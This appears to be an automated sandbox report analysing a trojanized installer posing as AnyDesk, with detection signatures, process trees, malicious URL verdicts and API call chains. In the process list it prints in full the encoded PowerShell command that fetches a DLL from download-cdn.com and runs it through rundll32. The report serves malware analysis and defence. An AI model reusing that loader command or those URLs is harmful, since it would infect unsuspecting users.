Windows Analysis Report
AnydeskSetup_26b30163.msi

Overview

General Information

Sample Name:AnydeskSetup_26b30163.msi
Analysis ID:787624
MD5:c4e9e9a06001c6197de2ea2fec3d2214
SHA1:369006350f6b4c43c7f51a90deb5e73a20156b55
SHA256:e4edb4cc8f35c7bab6e89774a279593d492714fce9865e53879f87d3704ad96c
Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected MalDoc
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Antivirus detection for URL or domain
Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Encrypted powershell cmdline option found
Powershell drops PE file
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Contains functionality to retrieve information about pressed keystrokes
Launches processes in debugging mode, may be used to hinder debugging
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Found evasive API chain (may stop execution after accessing registry keys)

Classification

  • System is w10x64
  • msiexec.exe (PID: 8 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\AnydeskSetup_26b30163.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 4312 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 1592 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 98DB8D4E6DAAAA17E94E76B65ACF188B MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • MSI5344.tmp (PID: 2904 cmdline: "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA== MD5: 6AAC525CFCDD6D3978C451BBA2BB9CB3)
  • powershell.exe (PID: 4440 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 2088 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 2460 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 5176 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3720 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 5064 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3584 cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
No configs have been found
Source: AnydeskSetup_26b30163.msi, Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Author: Joe Security, Strings: (none listed)
Source: C:\Windows\Installer\4641a8.msi, Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Author: Joe Security, Strings: (none listed)

      Data Obfuscation

      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer , CommandLine: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer , CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc 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, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4440, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer , ProcessId: 2088, ProcessName: rundll32.exe
      No Snort rule has matched

      AV Detection

      Source: https://download-cdn.com/download.php?f=Ldrp.dll&from=AnydeskSetup_26b30163.msi, Avira URL Cloud: Label: malware
      Source: https://download-cdn.com/pload/26b30163, Avira URL Cloud: Label: malware
      Source: http://download-cdn.com, Avira URL Cloud: Label: malware
      Source: https://download-cdn.com, Avira URL Cloud: Label: malware
      Source: https://download-cdn.com/pload/, Avira URL Cloud: Label: malware
      Source: https://download-cdn.com/pload/SOFTWARE, Avira URL Cloud: Label: malware
      Source: https://download-cdn.com/download.php?f=Ldrp.d, Avira URL Cloud: Label: malware
      Source: download-cdn.com, Virustotal: Detection: 14%
      Source: 4.2.powershell.exe.11a11318758.0.unpack, Avira: Label: TR/Patched.Ren.Gen
      Source: unknown, HTTPS traffic detected: 152.89.196.75:443 -> 192.168.2.4:49695 version: TLS 1.0
      Source: unknown, HTTPS traffic detected: 152.89.196.75:443 -> 192.168.2.4:49696 version: TLS 1.2
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb> source: MSI5344.tmp, 00000003.00000000.334329335.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, MSI5344.tmp, 00000003.00000002.336937187.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbb source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: MSI5344.tmp, 00000003.00000000.334329335.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, MSI5344.tmp, 00000003.00000002.336937187.00007FF7AF735000.00000002.00000001.01000000.00000003.sdmp, AnydeskSetup_26b30163.msi, MSI5344.tmp.1.dr, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.dr
      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: AnydeskSetup_26b30163.msi, 4641a8.msi.1.dr, MSI4B9F.tmp.1.dr, MSI494B.tmp.1.dr
      Source: C:\Windows\System32\msiexec.exe, File opened: z:
      Source: C:\Windows\System32\msiexec.exe, File opened: x:
      Source: C:\Windows\System32\msiexec.exe, File opened: v:
      Source: C:\Windows\System32\msiexec.exe, File opened: t:
      Source: C:\Windows\System32\msiexec.exe, File opened: r:
      Source: C:\Windows\System32\msiexec.exe, File opened: p:
      Source: C:\Windows\System32\msiexec.exe, File opened: n:
      Source: C:\Windows\System32\msiexec.exe, File opened: l:
      Source: C:\Windows\System32\msiexec.exe, File opened: j:
      Source: C:\Windows\System32\msiexec.exe, File opened: h:
      Source: C:\Windows\System32\msiexec.exe, File opened: f:
      Source: C:\Windows\System32\msiexec.exe, File opened: b:
      Source: C:\Windows\System32\msiexec.exe, File opened: y:
      Source: C:\Windows\System32\msiexec.exe, File opened: w:
      Source: C:\Windows\System32\msiexec.exe, File opened: u:
      Source: C:\Windows\System32\msiexec.exe, File opened: s:
      Source: C:\Windows\System32\msiexec.exe, File opened: q:
      Source: C:\Windows\System32\msiexec.exe, File opened: o:
      Source: C:\Windows\System32\msiexec.exe, File opened: m:
      Source: C:\Windows\System32\msiexec.exe, File opened: k:
      Source: C:\Windows\System32\msiexec.exe, File opened: i:
      Source: C:\Windows\System32\msiexec.exe, File opened: g:
      Source: C:\Windows\System32\msiexec.exe, File opened: e:
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: c:
      Source: C:\Windows\System32\msiexec.exe, File opened: a:
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_04A07390 SHGetFolderPathW,RegOpenKeyExA,SHGetFolderPathW,lstrlenW,lstrlenW,lstrlenA,lstrlenA,lstrlenA,SHGetFolderPathW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,7_2_04A07390
      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_04A07750 RegQueryValueExA,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,FindFirstFileW,lstrcatA,lstrcatW,lstrcatW,GetFileAttributesW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,lstrcatA,lstrcatA,lstrlenW,lstrcatA,lstrcatW,lstrcatW,FindNextFileW,FindClose,7_2_04A07750
      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_04A03AA0 GetFileAttributesW,lstrlenW,lstrcmpiW,lstrlenW,CreateDirectoryW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,SetFileAttributesW,FindNextFileW,lstrcatW,FindClose,7_2_04A03AA0
      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_04A03D50 lstrcpyW,lstrcpyW,lstrcpyW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,FindNextFileW,FindClose,7_2_04A03D50
      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_00FC7750 RegQueryValueExA,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,FindFirstFileW,lstrcatA,lstrcatW,lstrcatW,GetFileAttributesW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,lstrcatA,lstrcatA,lstrlenW,lstrcatA,lstrcatW,lstrcatW,FindNextFileW,FindClose,9_2_00FC7750
      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_00FC3AA0 GetFileAttributesW,lstrlenW,lstrcmpiW,lstrlenW,CreateDirectoryW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,SetFileAttributesW,FindNextFileW,lstrcatW,FindClose,9_2_00FC3AA0
      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_00FC7390 SHGetFolderPathW,RegOpenKeyExA,SHGetFolderPathW,lstrlenW,lstrlenW,lstrlenA,lstrlenA,lstrlenA,SHGetFolderPathW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,9_2_00FC7390
      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_00FC3D50 lstrcpyW,lstrcpyW,lstrcpyW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,FindNextFileW,FindClose,9_2_00FC3D50

      Networking